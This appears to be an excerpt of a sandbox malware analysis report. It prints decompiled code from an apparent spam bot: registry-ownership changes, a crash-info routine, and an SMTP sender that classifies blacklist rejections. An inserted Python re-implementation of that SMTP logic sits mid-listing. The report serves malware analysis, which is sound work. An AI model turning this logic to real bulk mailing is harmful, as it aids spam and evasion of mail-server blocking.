                                                                                                                                  0x00407c32
                                                                                                                                  0x00407c34
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407c34
                                                                                                                                  0x00407c36
                                                                                                                                  0x00407c38
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407c40
                                                                                                                                  0x00407c46
                                                                                                                                  0x00407cc9
                                                                                                                                  0x00407cc9
                                                                                                                                  0x00407cd0
                                                                                                                                  0x00407cd0
                                                                                                                                  0x00407cd9
                                                                                                                                  0x00407cdc
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407ce2
                                                                                                                                  0x00407ce8
                                                                                                                                  0x00407d5a
                                                                                                                                  0x00407d61
                                                                                                                                  0x00407d6a
                                                                                                                                  0x00407d6c
                                                                                                                                  0x00407d6e
                                                                                                                                  0x00407d72
                                                                                                                                  0x00407d78
                                                                                                                                  0x00407d7a
                                                                                                                                  0x00407d82
                                                                                                                                  0x00407d88
                                                                                                                                  0x00407d8a
                                                                                                                                  0x00407d92
                                                                                                                                  0x00407d98
                                                                                                                                  0x00407d9a
                                                                                                                                  0x00407d9c
                                                                                                                                  0x00407d9c
                                                                                                                                  0x00407d9a
                                                                                                                                  0x00407d8a
                                                                                                                                  0x00407da0
                                                                                                                                  0x00407da0
                                                                                                                                  0x00000000
                                                                                                                                  0x00407d6e
                                                                                                                                  0x00407cea
                                                                                                                                  0x00407cf0
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407cff
                                                                                                                                  0x00407d05
                                                                                                                                  0x00407d0b
                                                                                                                                  0x00407d0d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407d14
                                                                                                                                  0x00407d16
                                                                                                                                  0x00407d16
                                                                                                                                  0x00407d19
                                                                                                                                  0x00407d19
                                                                                                                                  0x00407d1b
                                                                                                                                  0x00407d1c
                                                                                                                                  0x00407d1c
                                                                                                                                  0x00407d4a
                                                                                                                                  0x00407d50
                                                                                                                                  0x00407d52
                                                                                                                                  0x00407d54
                                                                                                                                  0x00407d54
                                                                                                                                  0x00000000
                                                                                                                                  0x00407d52
                                                                                                                                  0x00407b6a
                                                                                                                                  0x00407b70
                                                                                                                                  0x00407b72
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407b7b
                                                                                                                                  0x00407b84
                                                                                                                                  0x00407b86
                                                                                                                                  0x00407b88
                                                                                                                                  0x00407b8c
                                                                                                                                  0x00407b92
                                                                                                                                  0x00407b94
                                                                                                                                  0x00407b9c
                                                                                                                                  0x00407ba2
                                                                                                                                  0x00407ba4
                                                                                                                                  0x00407bab
                                                                                                                                  0x00407bab
                                                                                                                                  0x00407ba4
                                                                                                                                  0x00407bb2
                                                                                                                                  0x00407bb2
                                                                                                                                  0x00000000
                                                                                                                                  0x00407b88

APIs
• RegOpenKeyExA.ADVAPI32(000000E4,00000022,00000000,000E0100,00000000,00000000), ref: 00407ABA
• GetUserNameA.ADVAPI32(?,?), ref: 00407ADF
• LookupAccountNameA.ADVAPI32(00000000,?,?,0041070C,?,004133B0,?), ref: 00407B16
• RegGetKeySecurity.ADVAPI32(00000000,00000005,?,?), ref: 00407B3B
• GetSecurityDescriptorOwner.ADVAPI32(?,00000022,80000002), ref: 00407B59
• EqualSid.ADVAPI32(?,00000022), ref: 00407B6A
• LocalAlloc.KERNEL32(00000040,00000014), ref: 00407B7E
• InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00407B8C
• SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00407B9C
• RegSetKeySecurity.ADVAPI32(00000000,00000001,00000000), ref: 00407BAB
• LocalFree.KERNEL32(00000000), ref: 00407BB2
• GetSecurityDescriptorDacl.ADVAPI32(?,00407FC9,?,00000000), ref: 00407BCE
Strings
Memory Dump Source
• Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: Security$Descriptor$LocalNameOwner$AccountAllocDaclEqualFreeInitializeLookupOpenUser
• String ID: D$PromptOnSecureDesktop
• API String ID: 2976863881-1403908072
• Opcode ID: d4f479c9f78d504b8da3df740f472ce51a34dde969fc05e485fb9939b8f25359
• Instruction ID: e17c9e5f60e255820364911aa1186e0accab4a2e7248257c6285c946b731c67d
• Opcode Fuzzy Hash: d4f479c9f78d504b8da3df740f472ce51a34dde969fc05e485fb9939b8f25359
• Instruction Fuzzy Hash: 6FA14D71D04219ABDB119FA0DD44EEF7B78FF48304F04807AE505F2290D779AA85CB69
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegOpenKeyExA.ADVAPI32(?,?,00000000,000E0100,?), ref: 00AD7D21
• GetUserNameA.ADVAPI32(?,?), ref: 00AD7D46
• LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00AD7D7D
• RegGetKeySecurity.ADVAPI32(?,00000005,?,?), ref: 00AD7DA2
• GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 00AD7DC0
• EqualSid.ADVAPI32(?,?), ref: 00AD7DD1
• LocalAlloc.KERNEL32(00000040,00000014), ref: 00AD7DE5
• InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00AD7DF3
• SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00AD7E03
• RegSetKeySecurity.ADVAPI32(?,00000001,00000000), ref: 00AD7E12
• LocalFree.KERNEL32(00000000), ref: 00AD7E19
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AD7E35
Strings
Memory Dump Source
• Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: Security$Descriptor$LocalNameOwner$AccountAllocDaclEqualFreeInitializeLookupOpenUser
• String ID: D$PromptOnSecureDesktop
• API String ID: 2976863881-1403908072
• Opcode ID: 1a53823342927d1e4650e54f1beed8d9b04cc787a6d03e02cd47dd5285ddf864
• Instruction ID: a905a2e7bfaed542c6a369792cdbbd47f8a25210f9b4116dc804412c943fcfdb
• Opcode Fuzzy Hash: 1a53823342927d1e4650e54f1beed8d9b04cc787a6d03e02cd47dd5285ddf864
• Instruction Fuzzy Hash: F6A13271900219AFDF21CF91DD84FEEBB79FB08340F14806AF506E6250EB758A85CB64
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 57%
E00406511(void* __ecx) {
	signed int _t75;
	signed int _t76;
	int _t78;
	void* _t83;
	signed int _t93;
	void* _t95;
	signed int _t99;
	int _t101;
	int _t115;
	int _t117;
	void* _t118;
	void* _t119;
	void* _t120;
	void* _t122;
	intOrPtr _t135;
	intOrPtr* _t137;
	void* _t139;
	void* _t141;
	void* _t143;
	void* _t144;
	void* _t152;

	_t122 = __ecx;
	_t139 = _t141 - 0x74;
	_t75 =  *(_t139 + 0x7c);
	_t135 =  *((intOrPtr*)(_t75 + 4));
	_t76 =  *_t75;
	 *(_t139 + 0x7c) = _t76;
	_t78 = wsprintfA(_t139 - 0x898, "\nver=%d date=%s %s\nc=%08x a=%p", 0x5e, "Jan 13 2018", "12:08:32",  *_t76,  *((intOrPtr*)(_t76 + 0xc)));
	_t143 = _t141 - 0x90c + 0x1c;
	_t117 = _t78;
	if(IsBadReadPtr( *( *(_t139 + 0x7c) + 0xc), 8) != 0) {
		E0040E318();
		ExitProcess(0);
	}
	_t83 =  *( *(_t139 + 0x7c) + 0xc);
	__imp__#8( *((intOrPtr*)(_t83 + 4)), E00406511);
	__imp__#8();
	_t118 = _t117 + wsprintfA(_t139 + _t117 - 0x898, " va=%08X%08X uef=%p",  *( *(_t139 + 0x7c) + 0xc),  *( *( *(_t139 + 0x7c) + 0xc)), _t83);
	_t119 = _t118 + wsprintfA(_t139 + _t118 - 0x898, "\n_ax=%p\t_bx=%p\t_cx=%p\t_dx=%p\t_si=%p\t_di=%p\t_bp=%p\t_sp=%p\n",  *((intOrPtr*)(_t135 + 0xb0)),  *((intOrPtr*)(_t135 + 0xa4)),  *((intOrPtr*)(_t135 + 0xac)),  *((intOrPtr*)(_t135 + 0xa8)),  *((intOrPtr*)(_t135 + 0xa0)),  *((intOrPtr*)(_t135 + 0x9c)),  *((intOrPtr*)(_t135 + 0xb4)),  *((intOrPtr*)(_t135 + 0xc4)));
	E0040EE2A(_t122, _t139 - 0x98, 0, 0x108);
	_t144 = _t143 + 0x48;
	 *((intOrPtr*)(_t139 - 0x98)) =  *((intOrPtr*)(_t135 + 0xb8));
	_t93 = 3;
	_push(0);
	_push(0);
	 *(_t139 - 0x8c) = _t93;
	 *((intOrPtr*)(_t139 - 0x94)) = 0;
	_push(0);
	 *(_t139 - 0x5c) = _t93;
	_push(0);
	 *((intOrPtr*)(_t139 - 0x68)) =  *((intOrPtr*)(_t135 + 0xc4));
	 *((intOrPtr*)(_t139 - 0x64)) = 0;
	_t130 =  *((intOrPtr*)(_t135 + 0xb4));
	 *(_t139 - 0x6c) = _t93;
	 *(_t139 + 0x7c) = _t93;
	_push(_t135);
	_push(_t139 - 0x98);
	 *((intOrPtr*)(_t139 - 0x78)) =  *((intOrPtr*)(_t135 + 0xb4));
	 *((intOrPtr*)(_t139 - 0x74)) = 0;
	_push(0);
	while(1) {
		_t95 = GetCurrentProcess();
		__imp__StackWalk64(0x14c, _t95);
		if(_t95 == 0) {
			break;
		}
		_t95 = 0;
		if( *(_t139 + 0x7c) != 0) {
			if( *((intOrPtr*)(_t139 - 0x88)) != 0) {
				_t115 = wsprintfA(_t139 + _t119 - 0x898, "ret=%p\tp1=%p\tp2=%p\tp3=%p\tp4=%p\n",  *((intOrPtr*)(_t139 - 0x88)),  *((intOrPtr*)(_t139 - 0x40)),  *((intOrPtr*)(_t139 - 0x38)),  *((intOrPtr*)(_t139 - 0x30)),  *((intOrPtr*)(_t139 - 0x28)));
				_t144 = _t144 + 0x1c;
				_t119 = _t119 + _t115;
				_t95 = 0;
			}
			 *(_t139 + 0x7c) =  *(_t139 + 0x7c) - 1;
			_push(_t95);
			_push(_t95);
			_push(_t95);
			_push(_t95);
			_push(_t135);
			_push(_t139 - 0x98);
			_push(_t95);
			continue;
		}
		break;
	}
	 *(_t139 + 0x7c) = _t95;
	_t120 = _t119 + wsprintfA(_t139 + _t119 - 0x898, "plgs:");
	 *(_t139 + 0x70) =  *(_t139 + 0x70) & 0x00000000;
	do {
		_t137 = 0x412c40 +  *(_t139 + 0x70) * 4;
		if( *_t137 != 0) {
			_t99 =  *(_t139 + 0x7c) & 0x80000007;
			if(_t99 < 0) {
				_t152 = (_t99 - 0x00000001 | 0xfffffff8) + 1;
			}
			if(_t152 == 0) {
				_t120 = _t120 + wsprintfA(_t139 + _t120 - 0x898, "\n");
			}
			_t101 = wsprintfA(_t139 + _t120 - 0x898, "\t%d=%p",  *(_t139 + 0x70),  *_t137);
			_t144 = _t144 + 0x10;
			_t120 = _t120 + _t101;
			 *(_t139 + 0x7c) =  *(_t139 + 0x7c) + 1;
		}
		 *(_t139 + 0x70) =  *(_t139 + 0x70) + 1;
	} while ( *(_t139 + 0x70) < 0x20);
	wsprintfA(_t139 + _t120 - 0x898, "\n");
	E0040E8A1(_t130, 1, "localcfg", "except_info", _t139 - 0x898);
	E0040E318();
	return 1;
}
Instruction addresses (one per decompiled line, in order):
0x00406511 0x00406512 0x0040651c 0x00406521 0x00406524 0x00406532 0x0040654d 0x0040654f 0x00406552 0x00406564
0x0040674e 0x00406755 0x00406755 0x0040656d 0x00406578 0x00406587 0x004065a3 0x004065e3 0x004065ee 0x004065f9
0x00406600 0x00406606 0x00406607 0x00406608 0x00406609 0x0040660f 0x0040661b 0x0040661c 0x0040661f 0x00406620
0x00406623 0x00406626 0x0040662c 0x0040662f 0x00406632 0x00406639 0x0040663a 0x0040663d 0x00406640 0x0040668a
0x0040668a 0x00406696 0x0040669e 0x00000000 0x00000000 0x00406643 0x00406648 0x00406650 0x00406671 0x00406673
0x00406676 0x00406678 0x00406678 0x0040667a 0x0040667d 0x0040667e 0x0040667f 0x00406680 0x00406681 0x00406688
0x00406689 0x00000000 0x00406689 0x00000000 0x00406648 0x004066a0 0x004066b3 0x004066b5 0x004066ba 0x004066bd
0x004066c7 0x004066cc 0x004066d1 0x004066d7 0x004066d7 0x004066d8 0x004066eb 0x004066eb 0x004066ff 0x00406701
0x00406704 0x00406706 0x00406706 0x00406709 0x0040670c 0x0040671f 0x00406734 0x0040673c 0x0040674b

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: wsprintf$Processhtonl$CurrentExitReadStackWalk64
                                                                                                                                  • String ID: %d=%p$_ax=%p_bx=%p_cx=%p_dx=%p_si=%p_di=%p_bp=%p_sp=%p$ver=%d date=%s %sc=%08x a=%p$ va=%08X%08X uef=%p$12:08:32$Jan 13 2018$except_info$localcfg$plgs:$ret=%pp1=%pp2=%pp3=%pp4=%p
                                                                                                                                  • API String ID: 2400214276-165278494
                                                                                                                                  • Opcode ID: c6cd3b0fe5fb700a95fcef714526d2b1842a8a69a0543b8ebdda1302f97d4f33
                                                                                                                                  • Instruction ID: e6dd37f2d7c7e48b8b359c94d8b0a85da35b73f81cc1d7405eac3f4e783bc3bd
                                                                                                                                  • Opcode Fuzzy Hash: c6cd3b0fe5fb700a95fcef714526d2b1842a8a69a0543b8ebdda1302f97d4f33
                                                                                                                                  • Instruction Fuzzy Hash: 26615F72940208EFDB609FB4DC45FEA77E9FF08300F24846AF95DD2161DA7599908F58
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

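The decompiled function that follows (E0040A7C1) is the sample's SMTP session handler: one call per command id (banner read, helo/ehlo, mail from, rcpt to, data, body plus the "\r\n.\r\n" terminator, quit), a recv loop that stops once the buffer contains the reply's final "NNN " line or exceeds 0x1f4 bytes, an atoi of the reply code against the accepted set 220/250/354/221/334/235, and a set of config-driven substring checks that turn a rejection into one of the numeric statuses 8, 9, 10, 11 or 15. The Python below is an added example, not code from the report or from the sample; it re-implements that state machine so an analyst can replay captured replies against it. The three config strings at 0x413630/0x413634/0x413638, the matching done by E0040A699 (assumed here to be a plain substring test), the buffer cmd 6 sends (assumed to be the caller's argument) and the localcfg "ip" value are not visible in the listing and are passed in as parameters.

```python
import re

# Added example (not code from the Joe Sandbox report or the sample): a
# re-implementation of the SMTP command/response handling in E0040A7C1.
OK_CODES = {220, 250, 354, 221, 334, 235}   # 0xdc 0xfa 0x162 0xdd 0x14e 0xeb
MAX_RESPONSE = 0x1F4                         # 500 bytes -> status 6 "Too big"
RECV_CHUNK = 0x3F6                           # each recv() asks for at most 1014
ERRTEXT_LEN = 0x76                           # reply excerpt copied to the caller


def build_command(cmd_id, arg, esmtp):
    """Bytes sent for command ids 1..7 of the jump table at M0040AB51."""
    if cmd_id == 1:                              # banner: nothing is sent
        return b""
    if cmd_id == 2:                              # flag 0x413668 set -> ehlo
        return (b"ehlo %s\r\n" if esmtp else b"helo %s\r\n") % arg
    if cmd_id == 3:
        return b"mail from:<%s>\r\n" % arg
    if cmd_id == 4:
        return b"rcpt to:<%s>\r\n" % arg
    if cmd_id == 5:
        return b"data\r\n"
    if cmd_id == 6:                              # body (assumed = arg), then terminator
        return arg + b"\r\n.\r\n"
    if cmd_id == 7:
        return b"quit\r\n"
    raise ValueError("command id %d is outside the part of the listing shown" % cmd_id)


def read_response(recv):
    """Mimic the recv loop at L28. recv(n) returns up to n bytes, b'' on close.
    Stops once the buffer holds the final-line marker (first three bytes plus a
    space), on close, or with status 6 when more than MAX_RESPONSE bytes arrive."""
    buf = b""
    marker = None
    while True:
        chunk = recv(RECV_CHUNK - len(buf))
        if not chunk:                            # recv() <= 0 ends the loop
            break
        buf += chunk
        if len(buf) > MAX_RESPONSE:
            return 6, buf                        # "Too big smtp respons (%d bytes)"
        if marker is None and len(buf) > 3:
            marker = buf[:3] + b" "              # 4-byte copy, _v129 forced to 0x20
        if marker is not None and marker in buf:
            break
    return None, buf


def classify(cmd_id, data, state, patterns, own_ip):
    """Status E0040A7C1 returns after the reply to cmd_id. state holds the ESMTP
    flag (global 0x413668); patterns are the three config strings (contents not
    in the report, substring match assumed); own_ip is the localcfg "ip" value."""
    if cmd_id == 7:
        return 2, ""                             # quit: reply is not inspected (L23)
    err = "Too small respons\n" if len(data) <= 5 else data[:ERRTEXT_LEN].decode("latin-1")
    if len(data) < 5 or data[-1:] != b"\n":
        return 7, "Incorrect respons"
    m = re.match(rb"\s*([+-]?\d+)", data)        # atoi-style parse (E0040EDAC)
    code = int(m.group(1)) if m else 0
    accepted = code in OK_CODES
    if accepted:
        state["esmtp"] = b"ESMTP" in data        # recomputed on every accepted reply
        cmd_id = 1                               # _t123 = 1 on the accepted path
    if cmd_id == 12 and code == 535:
        return 15, err
    if accepted:
        return 2, err
    if not all(patterns):                        # any NULL config string -> 11 (L70)
        return 11, err
    if cmd_id == 4 and patterns[0] in data:      # first pattern only after rcpt to
        return 8, err
    if patterns[1] in data:
        return 9, err
    if patterns[2] in data:
        return 10, err
    if cmd_id in (3, 4, 5, 6) and own_ip in data:
        return 9, err                            # reply names the bot's own IP (L62)
    return 11, err


def make_recv(chunks):
    """Constructed stand-in for a socket recv(): serves the chunks, then b''."""
    queue = list(chunks)

    def recv(n):
        if not queue:
            return b""
        head = queue[0][:n]
        queue[0] = queue[0][n:]
        if not queue[0]:
            queue.pop(0)
        return head
    return recv


if __name__ == "__main__":
    state, cfg, ip = {"esmtp": False}, (b"blocked", b"blacklist", b"greylist"), b"203.0.113.5"
    _, banner = read_response(make_recv([b"220 mx.example.test ESMTP ready\r\n"]))
    print(classify(1, banner, state, cfg, ip), state)
    print(build_command(2, b"bot.example", state["esmtp"]))
    status, ehlo = read_response(make_recv([b"250-mx.example.test\r\n250-SIZE 1000\r\n", b"250 HELP\r\n"]))
    print(status, classify(2, ehlo, state, cfg, ip))
```

The two-chunk EHLO reply in the usage shows why the 4-byte copy matters: "250-" continuation lines never contain "250 ", so the loop keeps reading until the final "250 HELP" line arrives, and any reply that does not end in a newline is rejected with "Incorrect respons" regardless of its code.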
                                                                                                                                  C-Code - Quality: 49%
                                                                                                                                  			E0040A7C1(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16) {
                                                                                                                                  				short _v129;
                                                                                                                                  				char _v132;
                                                                                                                                  				char _v1156;
                                                                                                                                  				signed int _t59;
                                                                                                                                  				int _t60;
                                                                                                                                  				void* _t61;
                                                                                                                                  				char* _t62;
                                                                                                                                  				void* _t63;
                                                                                                                                  				void* _t65;
                                                                                                                                  				void* _t82;
                                                                                                                                  				void* _t96;
                                                                                                                                  				intOrPtr _t102;
                                                                                                                                  				char _t103;
                                                                                                                                  				void* _t104;
                                                                                                                                  				int _t121;
                                                                                                                                  				intOrPtr _t123;
                                                                                                                                  				void* _t124;
                                                                                                                                  				CHAR* _t125;
                                                                                                                                  				intOrPtr* _t126;
                                                                                                                                  				intOrPtr* _t127;
                                                                                                                                  				void* _t129;
                                                                                                                                  				void* _t130;
                                                                                                                                  				void* _t131;
                                                                                                                                  
                                                                                                                                  				_t102 = _a8;
                                                                                                                                  				_t2 = _t102 - 1; // 0x0
                                                                                                                                  				_t59 = _t2;
                                                                                                                                  				_t125 =  &_v132;
                                                                                                                                  				if(_t59 > 0xb) {
                                                                                                                                  					L21:
                                                                                                                                  					_t60 = lstrlenA(_t125);
                                                                                                                                  					_t121 = _t60;
                                                                                                                                  					_t126 = __imp__#19;
                                                                                                                                  					_t61 =  *_t126(_a4, _t125, _t121, 0);
                                                                                                                                  					if(_t61 == _t121) {
                                                                                                                                  						if(_t102 != 6) {
                                                                                                                                  							L28:
                                                                                                                                  							_t127 = __imp__#16;
                                                                                                                                  							_t103 = 0;
                                                                                                                                  							_push(0);
                                                                                                                                  							_v1156 = 0;
                                                                                                                                  							_v132 = 0;
                                                                                                                                  							_push(0x3f6);
                                                                                                                                  							_t62 =  &_v1156;
                                                                                                                                  							while(1) {
                                                                                                                                  								_t63 =  *_t127(_a4, _t62);
                                                                                                                                  								if(_t63 <= 0) {
                                                                                                                                  									break;
                                                                                                                                  								}
                                                                                                                                  								_t103 = _t103 + _t63;
                                                                                                                                  								if(_t103 > 0x1f4) {
                                                                                                                                  									wsprintfA(_a16, "Too big smtp respons (%d bytes)\n", _t103);
                                                                                                                                  									_push(6);
                                                                                                                                  									L72:
                                                                                                                                  									_pop(_t65);
                                                                                                                                  									return _t65;
                                                                                                                                  								}
                                                                                                                                  								 *((char*)(_t130 + _t103 - 0x480)) = 0;
                                                                                                                                  								if(_v132 != 0) {
                                                                                                                                  									L33:
                                                                                                                                  									if(E0040EE95( &_v1156,  &_v132) != 0) {
                                                                                                                                  										break;
                                                                                                                                  									}
                                                                                                                                  									L34:
                                                                                                                                  									_push(0);
                                                                                                                                  									_push(0x3f6 - _t103);
                                                                                                                                  									_t62 = _t130 + _t103 - 0x480;
                                                                                                                                  									continue;
                                                                                                                                  								}
                                                                                                                                  								if(_t103 <= 3) {
                                                                                                                                  									goto L34;
                                                                                                                                  								}
                                                                                                                                  								E0040EE08( &_v132,  &_v1156, 4);
                                                                                                                                  								_t131 = _t131 + 0xc;
                                                                                                                                  								_v129 = 0x20;
                                                                                                                                  								if(_v132 == 0) {
                                                                                                                                  									goto L34;
                                                                                                                                  								}
                                                                                                                                  								goto L33;
                                                                                                                                  							}
                                                                                                                                  							_t123 = _a8;
                                                                                                                                  							if(_t123 == 7) {
                                                                                                                                  								L23:
                                                                                                                                  								_push(2);
                                                                                                                                  								goto L72;
                                                                                                                                  							}
                                                                                                                                  							if(_t103 <= 5) {
                                                                                                                                  								E0040EF00(_a16, "Too small respons\n");
                                                                                                                                  							} else {
                                                                                                                                  								E0040EE08(_a16,  &_v1156, 0x76);
                                                                                                                                  								_t131 = _t131 + 0xc;
                                                                                                                                  								_a16[0x76] = 0;
                                                                                                                                  							}
                                                                                                                                  							if(_t103 < 5 ||  *((char*)(_t130 + _t103 - 0x481)) != 0xa) {
                                                                                                                                  								E0040EF00(_a16, "Incorrect respons");
                                                                                                                                  								_push(7);
                                                                                                                                  							} else {
                                                                                                                                  								_t104 = E0040EDAC( &_v1156);
                                                                                                                                  								if(_t104 == 0xdc || _t104 == 0xfa || _t104 == 0x162 || _t104 == 0xdd || _t104 == 0x14e || _t104 == 0xeb) {
                                                                                                                                  									_t129 = 1;
                                                                                                                                  									 *0x413668 = E0040EE95( &_v1156, "ESMTP") & 0xffffff00 | _t74 != 0x00000000;
                                                                                                                                  									_t123 = 1;
                                                                                                                                  								} else {
                                                                                                                                  									_t129 = 0;
                                                                                                                                  								}
                                                                                                                                  								if(_t123 != 0xc || _t104 != 0x217) {
                                                                                                                                  									if(_t129 != 0) {
                                                                                                                                  										goto L23;
                                                                                                                                  									}
                                                                                                                                  									_t76 =  *0x413630;
                                                                                                                                  									if( *0x413630 == 0 ||  *0x413634 == _t129 ||  *0x413638 == _t129) {
                                                                                                                                  										L70:
                                                                                                                                  										_push(0xb);
                                                                                                                                  									} else {
                                                                                                                                  										if(_t123 != 4 || E0040A699( &_v1156, _t76) == 0) {
                                                                                                                                  											if(E0040A699( &_v1156,  *0x413634) == 0) {
                                                                                                                                  												if(E0040A699( &_v1156,  *0x413638) == 0) {
                                                                                                                                  													if(_t123 == 3 || _t123 == 4 || _t123 == 5 || _t123 == 6) {
                                                                                                                                  														_t82 = E0040E819(1, "localcfg", "ip", E004030B5());
                                                                                                                                  														_push( &_v132);
                                                                                                                                  														if(E0040EE95( &_v1156, E0040A7A3(_t82, _t82)) != 0) {
                                                                                                                                  															goto L62;
                                                                                                                                  														}
                                                                                                                                  													}
                                                                                                                                  													goto L70;
                                                                                                                                  												}
                                                                                                                                  												_push(0xa);
                                                                                                                                  												goto L72;
                                                                                                                                  											}
                                                                                                                                  											L62:
                                                                                                                                  											_push(9);
                                                                                                                                  										} else {
                                                                                                                                  											_push(8);
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								} else {
                                                                                                                                  									_push(0xf);
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							goto L72;
                                                                                                                                  						}
                                                                                                                                  						_t124 = 5;
                                                                                                                                  						_t96 =  *_t126(_a4, "\r\n.\r\n", _t124, 0);
                                                                                                                                  						if(_t96 == _t124) {
                                                                                                                                  							goto L28;
                                                                                                                                  						}
                                                                                                                                  						wsprintfA(_a16, "Error sending command (sent = %d/%d)\n", _t96, _t124);
                                                                                                                                  						return _t124;
                                                                                                                                  					}
                                                                                                                                  					if(_t102 != 7) {
                                                                                                                                  						wsprintfA(_a16, "Error sending command (sent = %d/%d)\n", _t61, _t121);
                                                                                                                                  						_push(5);
                                                                                                                                  						goto L72;
                                                                                                                                  					}
                                                                                                                                  					goto L23;
                                                                                                                                  				}
                                                                                                                                  				switch( *((intOrPtr*)(_t59 * 4 +  &M0040AB51))) {
                                                                                                                                  					case 0:
                                                                                                                                  						goto L28;
                                                                                                                                  					case 1:
                                                                                                                                  						_push(_a12);
                                                                                                                                  						_t100 =  &_v132;
                                                                                                                                  						if( *0x413668 == 0) {
                                                                                                                                  							_push("helo %s\r\n");
			} else {
				_push("ehlo %s\r\n");
			}
			goto L4;
		case 2:
			_push(_a12);
			_push("mail from:<%s>\r\n");
			goto L14;
		case 3:
			_push(_a12);
			_push("rcpt to:<%s>\r\n");
			L14:
			__eax =  &_v132;
			L4:
			wsprintfA(_t100, ??);
			goto L20;
		case 4:
			_push(7);
			_push("data\r\n");
			goto L19;
		case 5:
			goto L21;
		case 6:
			_push(7);
			_push("quit\r\n");
			goto L19;
		case 7:
			goto L21;
		case 8:
			_push(0xd);
			_push("AUTH LOGIN\r\n");
			L19:
			__eax =  &_v132;
			_push( &_v132);
			__eax = E0040EE08();
			goto L20;
		case 9:
			__eax = _a12;
			_t9 = __eax + 1; // 0x1
			__edx = _t9;
			do {
				__cl =  *__eax;
				__eax = __eax + 1;
			} while (__cl != 0);
			goto L9;
		case 0xa:
			__eax = _a12;
			_t15 = __eax + 1; // 0x1
			__edx = _t15;
			do {
				__cl =  *__eax;
				__eax = __eax + 1;
			} while (__cl != 0);
			L9:
			__eax = __eax - __edx;
			 *((char*)(__ebp + __eax - 0x80)) = 0;
			L20:
			_t131 = _t131 + 0xc;
			goto L21;
	}
}
0x0040a7cb
0x0040a7cf
0x0040a7cf
0x0040a7d3
0x0040a7d9
0x0040a87d
0x0040a87e
0x0040a886
0x0040a88d
0x0040a893
0x0040a897
0x0040a8c2
0x0040a8f2
0x0040a8f2
0x0040a8f8
0x0040a8fa
0x0040a900
0x0040a906
0x0040a909
0x0040a90a
0x0040a978
0x0040a97c
0x0040a980
0x00000000
0x00000000
0x0040a912
0x0040a91a
0x0040a9b9
0x0040a9c2
0x0040ab4a
0x0040ab4a
0x00000000
0x0040ab4a
0x0040a924
0x0040a92c
0x0040a954
0x0040a968
0x00000000
0x00000000
0x0040a96a
0x0040a96e
0x0040a970
0x0040a971
0x00000000
0x0040a971
0x0040a931
0x00000000
0x00000000
0x0040a940
0x0040a945
0x0040a94c
0x0040a952
0x00000000
0x00000000
0x00000000
0x0040a952
0x0040a982
0x0040a988
0x0040a89e
0x0040a89e
0x00000000
0x0040a89e
0x0040a991
0x0040a9d1
0x0040a993
0x0040a99f
0x0040a9a7
0x0040a9aa
0x0040a9aa
0x0040a9db
0x0040ab41
0x0040ab48
0x0040a9ef
0x0040a9fb
0x0040aa04
0x0040aa40
0x0040aa4d
0x0040aa52
0x0040aa2e
0x0040aa2e
0x0040aa2e
0x0040aa57
0x0040aa6a
0x00000000
0x00000000
0x0040aa70
0x0040aa77
0x0040ab35
0x0040ab35
0x0040aa95
0x0040aa98
0x0040aaca
0x0040aae6
0x0040aaef
0x0040ab12
0x0040ab1a
0x0040ab33
0x00000000
0x00000000
0x0040ab33
0x00000000
0x0040aaef
0x0040aae8
0x00000000
0x0040aae8
0x0040aacc
0x0040aacc
0x0040aaad
0x0040aaad
0x0040aaad
0x0040aa98
0x0040aa61
0x0040aa61
0x0040aa61
0x0040aa57
0x00000000
0x0040a9db
0x0040a8c8
0x0040a8d2
0x0040a8d6
0x00000000
0x00000000
0x0040a8e2
0x00000000
0x0040a8eb
0x0040a89c
0x0040a8af
0x0040a8b8
0x00000000
0x0040a8b8
0x00000000
0x0040a89c
0x0040a7df
0x00000000
0x00000000
0x00000000
0x0040a7ed
0x0040a7f0
0x0040a7f3
0x0040a803
0x0040a7f5
0x0040a7f5
0x0040a7f5
0x00000000
0x00000000
0x0040a845
0x0040a848
0x00000000
0x00000000
0x0040a852
0x0040a855
0x0040a84d
0x0040a84d
0x0040a7fa
0x0040a7fb
0x00000000
0x00000000
0x0040a85c
0x0040a85e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a86a
0x0040a86c
